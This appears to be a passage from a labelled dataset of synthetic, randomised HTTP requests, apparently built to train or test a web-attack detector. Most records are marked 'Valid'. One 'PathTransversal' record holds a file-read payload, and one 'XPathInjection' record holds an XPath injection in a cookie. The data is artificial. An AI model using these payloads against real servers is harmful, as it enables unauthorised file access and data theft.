Range: 014372-8712,-65,1852-9631
Referer: /qeie2tov/stmHkA/exieao0.bin
TE: trailers,gzip;q=0.0
Trailer: From
User-Agent: tpveenO/2.6
UA-CPU: x86
UA-Disp: 3306,320,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4914x5963
Via: janue/5.9 www.ezNF.jpeg, FTP/5.2 www.scou.gif
Transfer-Encoding: deflate
Upgrade: uqn7/3.0, adaoI/9.1, aossv/2.2, skt5nb/9.3
Warning: 366 233.192.227.218 "8tcsne6" 
X-Forwarded-For: 22.117.12.85
X-Serial-Number: 17174419292129745419
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17112
Start - Id: 29897
class: Valid
GET /6allJvunionj@/sehhubreeqrstnvrwd9.htm?Amraai6anjjn=mhote&oidrsFeMuPruy=aeh%7C&eE0dwU3Geu=620053&txbn=%3Ascriptb0i+hTclogi%259%3Ct%3Dk&dssst8coHo=hh%3C%7Copte+gelmc&eaNfo2ifdluor=iylaacovtE&n2pi=trwva3cat&laansto=rec&bTft=533&rqfS@Wv=rg11ue0hAih&Uded=7631&oiassntE9p=1009655920&umanaenklgb=n03 HTTP/1.1
Host: www.eAoiia.st
Connection: Keoetu
Accept: */*;q=0.7
Accept-Charset: iso-10646-ucs-2, iso-8859-3;q=0.0, x-mac-chinesetrad;q=0.6, x-mac-ce;q=0.8
Accept-Encoding: deflate;q=0.3
Accept-Language: onRf-Onmle, wWi-eaakn;q=0.0, clE-m, ahesnu4S-S;q=0.7, ampre-el4ah
Cache-Control: min-fresh=6
Client-ip: 234.119.129.118
Cookie: ifm30C=4/ ;TcEiis=0;rptwenlafc=837061069
Cookie2: $Version="519"
Date: Thu, 26 Nov 09 10:23:22 CET
ETag: W/"ZkdC@xIWM1fG_PGCfIH"
Expect: 100-continue
From: mnafich@nsbersImyu.fr
If-Modified-Since: Thu, 10 Nov 05 08:28:36 UTC
If-Unmodified-Since: Mon, 22 Nov 04 20:45:42 CET
If-Match: *
If-None-Match: "AueNQcPq.8s36rjkCA6g"
If-Range: Sat, 31 Oct 09 05:10:33 GMT
Max-Forwards: 7
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: meaud m7h0u=nztdpF
Authorization: Basic Y3VmamFydHI6aGN1aWh0
Range: 7-5389
Referer: /p11e.nsf
TE: trailers,chunked,trailers
Trailer: Accept-Language
User-Agent: teosp5thos
UA-CPU: Sparc
UA-Disp: 754,5719,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3101x221
Via: HTTP/0.2 www.epuR.jpeg:3, FTP/7.6 www.cmmt.html
Transfer-Encoding: identity
Upgrade: spt/3.7, rs8xQ/8.1, ovEla/6.7, hsp/5.3, ecaol/5.8
Warning: 213 www.chsq.js "nlm16isgerEe" "Sat, 10 Oct 09 10:33:19 CET"
X-Forwarded-For: 255.72.182.148
X-Serial-Number: 615013754882533
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29897
Start - Id: 23075
class: Valid
GET /iz/ehpsqo/pu.LTN8ysqieUu5suD.gif?bW.oxR.wK=rPP4S85&mndaipefra=etcosqntpueOIoo97t&ieie1ofStshr=3ecadmindois0ed2vReisecr&oeoot=ppi&hzlr=thwb%3Dft%3B9dnc-x&Ma3enEapglhia=80&dmh=+sSh&afslen=mgesmhbomgepratao&ni7ewrntmsp=4%7C+n&hrohymF=hOvzD1zhs-JJ&nA=9x7fIJ&reiano=42650 HTTP/1.1
Host: 87.39.47.31
Connection: close
Accept: image/*, application/*;q=0.4, video/mpeg
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, gzip;q=0.0
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 159.226.236.201
Cookie: hi6lthE=g~;7c=feami7@naIUpm;php-delete7V11Vhttp=27
Cookie2: $Version="97"
Date: Fri, 04 Feb 05 21:33:03 UTC
ETag: W/"4EaK.gBzaKrlFCDof@"
Expect: 100-continue
From: taxc@cvbh.de
If-Modified-Since: Tue, 03 May 05 06:17:38 GMT
If-Unmodified-Since: Tue, 20 Mar 07 02:06:29 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 23 Nov 05 15:09:51 GMT
Max-Forwards: 103
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic VHhlcmluOmV0bnJh
Authorization: Basic dG9hdDg6bHlpbw==
Range: 6188-,51833-880,99424-5215
Referer: http://rsslL.com/mc6an/dt0o/ytrI.php3
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: b6sP5iQ http://www.am9aPu.net
UA-CPU: MIPS
UA-Disp: 5084,527,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8704x5020
Via: 9.6 www.bnez.jpeg, HTTP/7.2 www.teLrsdO.png:9, 3.4 www.oleldhj.tiff
Transfer-Encoding: identity
Upgrade: D8c/9.2, rfff9/6.0, ios/5.5
Warning: 077 www.iusll2d.htm "OizonXfehci" "Mon, 05 Jan 09 09:29:14 UTC"
X-Forwarded-For: 95.86.251.48
X-Serial-Number: 18684889581671575
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23075
Start - Id: 31316
class: Valid
GET /tHz/oe/Al.BGG44fn6X10/xjgN@qT8N-gb.shtml?8qOeeuorsdes=noomeleoudpn&gdivKhtaccesKpz=between%29echoaTlomUe%5D+script&eriiamnieot=ptf2wuu3oocsrF&D21TadRDbodyservices.I=1846&Gj.jAS3jmLY=vne&GM6p9PLHY=elv HTTP/1.1
Host: www.nd3ahokn.ch:45870
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-age=9991
Client-ip: 115.41.215.171
Cookie: cmdHjB-fo=yt? ;rSs=168029;puuu=4
Cookie2: $Version="7"
Date: Tue, 26 May 09 13:08:41 CET
ETag: W/"CBA8E6CDeaAE0rORVlA"
Expect: 100-continue
From: rgc6ndo@etox.net
If-Modified-Since: Fri, 22 Jul 05 16:19:36 UTC
If-Unmodified-Since: Thu, 26 Feb 09 21:14:20 UTC
If-Match: *
If-None-Match: "uY7fGN_YnPcGe7IQVS"
If-Range: Sun, 24 Jul 05 12:25:34 CET
Max-Forwards: 364
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="rnibihas"
Authorization: Digest uri=/txeyHeD/tnqf8hq/i2tqel6a/ruhfsrr/qcnddtm.wmn
Range: -388719
Referer: http://www.ORtta8.fr/1enaee/tcku3rhs/ealhldon.sh
TE: deflate
Trailer: If-Range
User-Agent: Mozilla/6.4 (compatible; Konqueror/9.8; Mac OS X; rscLSfbe; 0oAsmi; qtbr4ahny)
UA-CPU: MIPS
UA-Disp: 1773,6929,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3795x126
Via: FTP/9.0 56.208.145.168
Transfer-Encoding: gzip
Upgrade: dGeost/2.9, rda/6.8
Warning: 107 www.ohem.gif "gsElmnsdshO7" "Wed, 21 Mar 07 14:34:20 GMT"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 61504
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 31316
Start - Id: 44916
class: PathTransversal
GET /irQyAO/2ninsnoatertgnzE0gan/oM/mtDy3V_h1Oy.png?nlepooAu=doc%28+++file%3A%2F%2F%2Fc%3A%2Fqu8u%2Fiilte.xml+++%29 HTTP/1.1
Host: 74.69.140.43
Connection: duso
Accept: audio/*, text/*;q=0.5, video/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: s-kt, trtvu-sbnbc;q=0.8, iloen-oh;q=0.4
Cache-Control: only-if-cached
Client-ip: 117.77.195.37
Cookie: eomDgcyU4tyons=sduaxuHC26;rr6ne=hRi_1W;tbkcatnIw=e:m0 4My;a2wwbe=161970;ElsIimEakgu=u:iSscript;eywuaRcbhg=s<na05i
Cookie2: $Version="12"
Date: Sun, 17 Jan 10 02:48:22 UTC
ETag: W/"i1-ktEh-Ty9r_0PkCH"
Expect: mai9
From: mrohh@9oymeFs.it
If-Modified-Since: Thu, 11 May 06 14:46:10 CET
If-Unmodified-Since: Thu, 03 Jun 04 13:05:45 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Jul 08 09:38:13 CET
Max-Forwards: 1
MIME-Version: 8.3
Pragma: toys='srmoNJco'
Proxy-Authorization: Basic ZUVpejZkbm06ZlhjM2ht
Authorization: c1Da srtarpts=Atit
Range: 50635-77
Referer: /yidd/retwaNtf/psoa.jpg
TE: trailers,gzip;q=0.5
Trailer: Accept-Encoding
User-Agent: ekl8Hkb9t
UA-CPU: StrongARM
UA-Disp: 2288,5387,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6797x3315
Via: FTP/5.8 207.104.136.242:6, emEate/3.5 193.243.86.99, 0.5 213.49.248.186
Transfer-Encoding: roDnih
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 988 www.oihee.jpg:20 "etxoOiolmnofnnjob1c" "Mon, 09 Mar 09 19:24:20 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44916
Start - Id: 8387
class: Valid
GET /zHZmux/ro94ZyDLN/rpyJb_Iimzy/cra2nxolrprlsbj9ln/eDK/qsn/2BJZT3Pbqh.exe?kie=9681682439 HTTP/1.1
Host: 81.93.96.157
Connection: 2MHu
Accept: text/xml, audio/*;q=0.5, image/jpeg;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, deflate;q=0.3, compress;q=0.3, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 55.14.13.126
Cookie: gKservices3Cy=1418;JhwuL9=nsot-
Cookie2: $Version="05"
Date: Mon, 23 May 05 04:44:46 CET
ETag: "3jaqTACFujJ6duM"
Expect: untOhhii=htmg
From: erpa3@smdtCgnon.be
If-Modified-Since: Thu, 05 Feb 04 08:05:54 GMT
If-Unmodified-Since: Fri, 31 Oct 08 12:47:25 GMT
If-Match: "FjQ246waaloqP.heIAs"
If-None-Match: *
If-Range: Sat, 24 Sep 05 13:00:25 CET
Max-Forwards: 2
MIME-Version: 9.5
Pragma: LvoYhn=R
Proxy-Authorization: Basic ZGtjczplWWNuZHRmRA==
Authorization: Basic dGtvY2U6aWNoYzdxYWU=
Range: 994131-66069
Referer: /shhaNg/simsn/yeetWe.php3
TE: deflate;q=0.3,deflate;q=0.0,gzip;q=0.8
Trailer: Warning
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 3.5; se-ib; rv:6.4.2) Gecko/96199419
UA-CPU: MIPS
UA-Disp: 283,560,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 4723x390
Via: ee6is/4.4 www.7tan.jpeg, HTTP/6.0 221.222.36.141, 3.6 www.scxmH.htm
Transfer-Encoding: deflate
Upgrade: o1iL/4.6
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 240.233.176.16
X-Serial-Number: 4380608
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 8387
Start - Id: 9135
class: Valid
GET /8r3npeeag8S3rwiex.html?gseai=s&sh9hi7wquah5l=9570491&7feoaulohtKOs=1&pnehicetfra=eD8W%40C&0execTR6opttj=ka6ossarp&aieebst=+ah&dhusa=185301&han5rshhne=su&wrubectRts=40273206&inpreohteaNo=19198059&7o=dn%3Epa&sEn6bd8ynbns7b=i8b HTTP/1.1
Host: www.tKer.fr:80
Connection: keep-alive
Accept: text/xml
Accept-Charset: gb2312;q=0.5, iso-8859-8;q=0.4, x-mac-roman;q=0.1, x-mac-ce;q=0.1, iso-2022-kr
Accept-Encoding: identity, deflate, compress, identity;q=0.1, identity
Accept-Language: nr-tsNmFo;q=0.4, pbgrmeyA-A7Aee1rS;q=0.8, 0ptns0-wdni;q=0.1
Cache-Control: no-transform
Client-ip: 91.224.33.57
Cookie: rrnhyeoidaeg=ttsesuo;wG4telnettQbgBandevalE=iframer IS;gnaaicr=386745;dtNrtoS8ieoy5nT=36;V7MqIzB@@=lr;tbbvhalt=374743
Cookie2: $Version="69"
Date: Sun, 25 Jul 04 20:14:15 CET
ETag: W/"Olimrl8N8EDcthct"
Expect: 100-continue
From: ctaMmsso@ernuTGi.biz
If-Modified-Since: Wed, 09 Feb 05 22:11:48 UTC
If-Unmodified-Since: Mon, 25 Aug 08 02:01:16 UTC
If-Match: *
If-None-Match: "5mpkYTh8.xw9gMyaVI"
If-Range: Sun, 21 Jan 07 07:44:31 CET
Max-Forwards: 57
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest qop=fe4a
Authorization: Digest username="1rmyafy"
Range: -8237
Referer: /ahir/lf6d/aetlh4c/3ezrroyd.exe
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/9.6 (Machintosh; U; Mac OS X 4.0; Ed-ta; rv:6.1.0) Gecko/85907531
UA-CPU: MIPS
UA-Disp: 419,947,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0794x264
Via: xb9/8.6 34.123.255.167
Transfer-Encoding: identity
Upgrade: Oseec/1.0, nnnre/5.8, Erl/6.8, enun9n/4.2
Warning: 136 255.90.245.205 "aYBe5ugoa7It7" 
X-Forwarded-For: 177.251.149.163
X-Serial-Number: 688483710117371
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 9135
Start - Id: 6939
class: Valid
PUT /LdjUdefromoxj/hh7Sli/th-nOx.krQ/D3c/2ldadsnDdlycetecjIh.msf? HTTP/1.0
Content-Length: 277
Content-Language: ixebD7
Content-Encoding: gzip
Content-Location: /aoZmlbe.mdb
Content-MD5: bHVyd3FlbWFvdGllNGdwSA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Nov 06 13:53:45 UTC
Last-Modified: Fri, 08 Jul 05 24:34:41 UTC
Host: www.0roThet.fr:97563
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-8;q=0.3, hz-gb-2312;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: nwrdgtir-aenmai, ted-43, xent-as, phegss-isDesAe
Cache-Control: limns=o7saEn
Client-ip: 158.35.126.167
Cookie: datergpde=afv7E
Cookie2: $Version="44"
Date: Tue, 07 Aug 07 18:25:00 UTC
ETag: "JHo7VitR2mbpIDyp5skI"
Expect: 100-continue
From: 9tasgo@r6haat.org
If-Modified-Since: Thu, 24 Dec 09 15:37:36 CET
If-Unmodified-Since: Wed, 03 Aug 05 10:44:24 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Jun 05 12:42:11 CET
Max-Forwards: 35
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="1sg3"
Authorization: NTLM Y2hiaFR3ZWt5dWh6YWUwY3B0aGRkN3V0cmVlZTUzSTRPbA==
Range: -35,310954-4,-65030
Referer: /rotpusm/s3sEs/Lzkdrie/shTos/hrwazi.shtml
TE: deflate;q=0.8,deflate;q=0.0,deflate
Trailer: From
User-Agent: Mozilla/1.0 (X11; U; SunOS sun4u 1.6; iF-ie; rv:1.4.3) Gecko/92751402
UA-CPU: PowerPC
UA-Disp: 7932,0076,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 751x6296
Via: wmnr/3.9 161.124.54.47, 4.0 14.141.208.111
Transfer-Encoding: saan; iTbu3ch=oo3Nri
Upgrade: nsobNi/4.6
Warning: 250 59.47.69.234 "dllcxoqieenmhiSaaaes" 
X-Forwarded-For: 26.141.211.211
X-Serial-Number: 95729667
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nh5tn2s2=0>iuo&ojinniPtemc=we&eysuyrietsi=ldpxyo3n&Llocation2t=0466307&tse3nillsN= ?&hnm=5690512&oe8Rsi6n2oecmce=kpvQ4QA1IuG&EzMow1l=lttservices@ltmpkIeofvglainbm&mnaoEeahjca0rbi=a5.n&Fx1v6zRo7C=3\vrBdmI8s-otr&20isaoHaih1shou=sdkpumnylo&atscq=68879131&feonsxgh=ntn3pOdh

End - Id: 6939
Start - Id: 17313
class: Valid
GET /7S0/CnullAsock_streamCGUetc/ohtextnkhiboce/5CZAUPzYEId/3jyJkGopenDnpaoptwinntc5/mjU6YXLRYSvbscript/d.qVC/h_dv1gjwZN9P2l19I/hEos8/abYhPE5ubk@/1hRCLAr3-connect4Vd3.exe?Phjh7m1arneh=r8LOEaxt1E0&seloustbeiXabem=u&m6tne=eehAIaahytdatit&pNH_lcaG=le%3Bed4letzjYsu&nshla2h=iia6a3tta2t&enoqens=4aabgo3eEllac HTTP/1.1
Host: 84.120.229.59:70165
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-age=42294
Client-ip: 108.40.148.167
Cookie: ILt=1;ei=aKcJN;mmcarSopeelpw=197036293;eetaistwhsi= ot@p ;C9tbti=e;o;iInner5=2
Cookie2: $Version="0"
Date: Sun, 08 Feb 04 12:52:05 GMT
ETag: W/"z7ZIhf6.P0MN21t42TF"
Expect: 100-continue
From: Az90tn@tbpaeA.ch
If-Modified-Since: Mon, 22 Feb 10 04:13:45 GMT
If-Unmodified-Since: Sun, 23 Nov 08 09:58:49 UTC
If-Match: "xEKX.Q9HcCJZw05"
If-None-Match: *
If-Range: "WnL.8rJeBFhmuJ_QB8"
Max-Forwards: 94
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: Digest response="68FadF7caE3Cc5D1e1b7DF95be5E8dDb"
Range: -245038,-1,-13038
Referer: http://www.Oawy.gov/HieEob1m.cgi
TE: deflate;q=0.3
Trailer: Max-Forwards
User-Agent: eRte/2.7.5.2.1
UA-CPU: Sparc
UA-Disp: 8556,725,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0027x5589
Via: 2.4 www.bPAcB.gif, FTP/3.2 101.192.13.136:63843, rena1/7.2 206.159.253.102
Transfer-Encoding: identity
Upgrade: rtwAw/6.8, rmn5/1.4, az0mh/5.0
Warning: 269 www.RTdurt.js:6577 "plar3sohce" 
X-Forwarded-For: 105.119.73.45
X-Serial-Number: 4192001854421
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17313
Start - Id: 48424
class: XPathInjection
GET /jNg/tlypu643XmHpTyAMiH3/tZQs17wftTqQc7U/iu8/ift7/8X@T5RbinexecwWQ9@s/6OlHGX.swf?odoOsdrhm=5etE&eg9tjesqwOhEWwt=nr-cNG&1eosepsaqobnchi=eu5n0asneAejwGnt&rrgttootdaitc8e=3195350&stootaugt7=6307&atdt8=SCreilot+cn&wyohdeo69seo=0&ndel6btq5=vyetmoos HTTP/1.0
Host: www.tiaseul.fr
Connection: close
Accept: video/*, text/plain;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: esbseenr-ioehbat;q=0.8, 6thmeO-dfnenohe, E2n-Dtelm;q=0.8, doYbaolh-tet, str2ra6-bvO
Cache-Control: min-fresh=897
Client-ip: 118.241.235.123
Cookie: LDaEFx=5371     or  yaxerc/oe/etoe/child::node()[position()=599]   or  378=;cjXZ-hX=tak;ug1Oexecm=wsar9gdS
Cookie2: $Version="50"
Date: Mon, 02 Jan 06 08:57:27 CET
ETag: W/"MZ.Sx2ldffMvzMM"
If-Modified-Since: Sun, 25 Jan 04 11:55:51 GMT
If-Unmodified-Since: Wed, 05 Apr 06 16:06:09 UTC
If-Match: *
If-None-Match: "ploQN8wZhkg.XtK"
If-Range: Wed, 07 Jun 06 24:29:52 UTC
Max-Forwards: 14
MIME-Version: 7.3
Pragma: pleorbe1=gl
Authorization: mee9 enyi=ssdhd
Range: 32-,764603-,-5924
Referer: /n0sFO/2ye7D.htm
TE: trailers,deflate;q=0.9,gzip;q=0.4
Trailer: Host
User-Agent: Mozilla/2.8 (Windows; U; WinNT 1.3; vn-ee; rv:9.8.7) Gecko/10652530
UA-Color: color32
UA-Pixels: 3994x194
Via: imw8/6.2 www.esomQpa.tiff, cao/4.9 www.Hirsraje.jpg:3969
X-Forwarded-For: 110.20.49.195
X-Serial-Number: 2509612458
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48424
Start - Id: 28513
class: Valid
GET /dV/O6Hc@_neopenzxterm1zcat/tee2Rweifi7e.gif? HTTP/1.1
Host: 204.178.226.163
Connection: iJrug
Accept: */*
Accept-Charset: windows-1254;q=0.8, gb2312, windows-1257, utf-8;q=0.7, x-mac-icelandic
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=5707
Client-ip: 147.229.89.139
Cookie: hhfhhteiseEe=0570775767;e0hmjuudnce=~cla
Cookie2: $Version="0"
Date: Fri, 05 Nov 04 19:22:04 GMT
ETag: W/"56y2QcstYYp.E36"
Expect: 100-continue
From: Hiedyo@ds6eekiny.org
If-Modified-Since: Tue, 10 Apr 07 18:14:42 UTC
If-Unmodified-Since: Mon, 31 Aug 09 10:24:36 UTC
If-Match: "vdkP44A6BMHC.376"
If-None-Match: *
If-Range: Sat, 09 Sep 06 24:32:13 CET
Max-Forwards: 459
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://Hsay.st/trannnt/atcu/nxsempc/fmeipts7/enyoea.bin
Authorization: rbjte4 sH2seu=l6ebul
Range: 7-93,534-66746
Referer: http://ati6ae.st/hc1ea0/isrsec.gif
TE: gzip,deflate
Trailer: If-Unmodified-Since
User-Agent: eqU5LbRj.n http://www.piatrnr.org
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 116x668
Via: 9.7 56.28.222.96, 0.4 234.175.95.191
Transfer-Encoding: deflate
Upgrade: t5rg/1.6
Warning: 758 139.134.163.207 "9ssartsdi" 
X-Forwarded-For: 36.15.26.228
X-Serial-Number: 9412157070981544486
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28513
Start - Id: 9246
class: Valid
GET /rli2lstamznaelttei/omdereowdedHchitt/tEtnfY.577r9Oich3/udkSqPDZNwvkQZbDqDXA/fTbNa/5Ni.bin?oLacnetbiEhrle=ohtpasse&eiir3q2mac1i=875620602&eUlrryce8r=q&tonaegippseAe9e=iouulmRebetweens&y8AWzhd6autoexecv6W=%40wsS&Oj0ZOzKsJQq=143286&5dDDtdgy7fr2=99423251&keh7otyantnlh=o_q4L&ixdHpINeheec4en=p%28eb-rod+o%5C%3Foatml&lana1aWd5oNn=rpo+1dddfan&fys=rX1-KJGg HTTP/1.1
Host: www.th4jroaui.cz
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: compress, compress, compress;q=0.4, identity;q=0.2
Accept-Language: tletne-ooph, Di-Halt
Cache-Control: no-store
Client-ip: 253.111.158.204
Cookie: 6slremf=9423;nmlntt3HtDsfi=3918007;ujlhonit==msr
Cookie2: $Version="776"
Date: Mon, 16 Jan 06 16:57:49 CET
ETag: "lC2c3zVTXTW@QzaDI"
Expect: 6yez
From: dreQEL@4sied6c.gov
If-Modified-Since: Sun, 11 Nov 07 06:00:48 CET
If-Unmodified-Since: Mon, 16 Aug 04 05:29:32 GMT
If-Match: "qHF3GXO3u@20RzmxXizt"
If-None-Match: "N7wabIvxzgncGyG97n"
If-Range: *
Max-Forwards: 059
MIME-Version: 8.5
Pragma: aja=wioner
Proxy-Authorization: NTLM ZWlNc2xhWmYxRTJ0ZXJ5T25zeUVvc3RsaTZxcnJobjg2b2lnZWty
Authorization: hcht hsttt=6mio6
Range: 7-,506-547400,2408-38770
Referer: http://www.eing.org/CeoeAe/oebu/wbtoRR/Tis6Hh6d/n1ntdb.pl
TE: gzip;q=0.7,trailers,chunked
Trailer: If-None-Match
User-Agent: egenDod http://www.eiTti.st
UA-CPU: Sparc
UA-Disp: 2373,285,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 476x394
Via: 4.1 www.dynmvn0m.js:9921
Transfer-Encoding: identity
Upgrade: dOaas/3.7
Warning: 214 149.148.244.123 "nrssahmgn6i" 
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 1183093668274031792
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 9246
Start - Id: 7442
class: Valid
POST /haBz8.fAcxTqsXQB/oveZ.asp? HTTP/1.0
Content-Length: 19
Content-Language: ad3n
Content-Encoding: gzip
Content-Location: http://www.hsNieri.uk/5rhO/ioeev.jpeg
Content-MD5: eXFhZGVudGJUZW5yRTQyUg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Mar 05 20:21:06 GMT
Last-Modified: Thu, 13 Jan 05 04:22:27 CET
Host: www.gorlwe8ir.org
Connection: close
Accept: */*;q=0.7
Accept-Charset: isiri-3342
Accept-Encoding: identity, deflate;q=0.6
Accept-Language: *
Cache-Control: 9eeadE='eo9na'
Client-ip: 88.207.186.172
Cookie: h7Oie=64;m58ev=67343;isgRmriwhe=du)e;h6mt=314;5dhGsanlfmzaseP=s-as
Cookie2: $Version="834"
Date: Sat, 15 May 04 02:26:08 UTC
ETag: "dH@b1826PIx.JnQoCp"
Expect: yosI=crtgua
From: oyfadNse@f8Ndeoame.biz
If-Modified-Since: Sat, 21 Apr 07 06:31:59 UTC
If-Unmodified-Since: Sat, 09 Dec 06 13:49:19 UTC
If-Match: "5b3mki6j.I8Ma@0"
If-None-Match: *
If-Range: "ePIf-G61rR3LoQkp"
Max-Forwards: 32
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM QWlvYWVpdGRlcm5pcnZxdGVidG1jdGFhbWVpa3VpWXRmb0d5
Authorization: Basic c2x1TmVlOndoZDM=
Range: -7,476345-903,6137-
Referer: http://mysmcnk.cz/mnin/evp6ng/ggiitgen/e0faz.php3
TE: trailers,gzip
Trailer: Host
User-Agent: Ysacwaxrlh (tGwXQLpJCw; o8UL5d0i; 4P4u7_hzmq)
UA-CPU: MIPS
UA-Disp: 634,725,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7331x9166
Via: FTP/2.5 www.ditv.shtml
Transfer-Encoding: gzip
Upgrade: coig/7.2, 3eo/7.1, esee/4.2, dnw/5.7
Warning: 025 64.244.224.104 "rzpneoH" "Fri, 17 Feb 06 18:25:11 UTC"
X-Forwarded-For: 137.37.20.120
X-Serial-Number: 705782938216902909
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

d0tntfeu1iisgl1=382

End - Id: 7442
Start - Id: 6287
class: Valid
PUT /@BUrpSi5rW1gqBg/xTd4lijeatot/g6N56wZKo.shtml? HTTP/1.1
Content-Length: 40
Content-Language: jlbto
Content-Encoding: gzip
Content-Location: http://www.wrmtc.cz/wenA/oiic5lTb/SobnQs.asp
Content-MD5: bEl0RXRzd2FlZW55QzFhSQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Mar 04 22:01:12 GMT
Last-Modified: Sat, 20 Jan 07 24:29:36 UTC
Host: www.nmoe.com
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.7, windows-1253, x-mac-greek;q=0.3, windows-1258;q=0.2
Accept-Encoding: 
Accept-Language: dye-sexp, abexnpzr-reljhij;q=0.5, el4-iiTmeym, r-e
Cache-Control: min-fresh=59141
Client-ip: 221.191.241.201
Cookie: esnN9n=155427734;OfZTshutdown=qWJYeugi;onmtyonl5srn15=3;@W06=eth5wj88n
Cookie2: $Version="5"
Date: Wed, 09 Jan 08 12:51:32 GMT
ETag: "oxEd@SScH6-wK-wrZrt"
Expect: 4aeBlD=inoanbD
From: ueos@tseotr.biz
If-Modified-Since: Mon, 07 Apr 08 14:52:39 CET
If-Unmodified-Since: Wed, 26 Jan 05 15:03:07 CET
If-Match: "fyC7VF7wLrBC3MvRI"
If-None-Match: "I@FOpJWam5ihK_CKVAe"
If-Range: *
Max-Forwards: 9570
MIME-Version: 9.1
Pragma: oaab='qrpe'
Proxy-Authorization: Basic ZGlpcm1uc3Q6eG5zaGxtaA==
Authorization: NTLM VGZJaTQ0cmU2enJ0S2MybHNpbmNnemFhb3RybmhFUmVadW96dXNTMHRlbmhzY3N3
Range: 10-,-849357
Referer: /t0naItco.mpeg
TE: deflate,chunked;q=0.7
Trailer: From
User-Agent: Mozilla/5.4 (compatible; Konqueror/6.6; Solaris; iomesRw; wkyal; zelc6r)
UA-CPU: Sparc
UA-Disp: 2381,870,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 6564x871
Via: FTP/3.3 www.atamup.js:35
Transfer-Encoding: compress
Upgrade: esochH/3.1, ehsqp/5.4, atmg/1.6, Aulr/8.6
Warning: 097 84.156.203.77 "rilteriyvagst2t" 
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 4610703908
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ll1ToorwdXtmit=metafrom|a)&Tre9=6011

End - Id: 6287
Start - Id: 14019
class: Valid
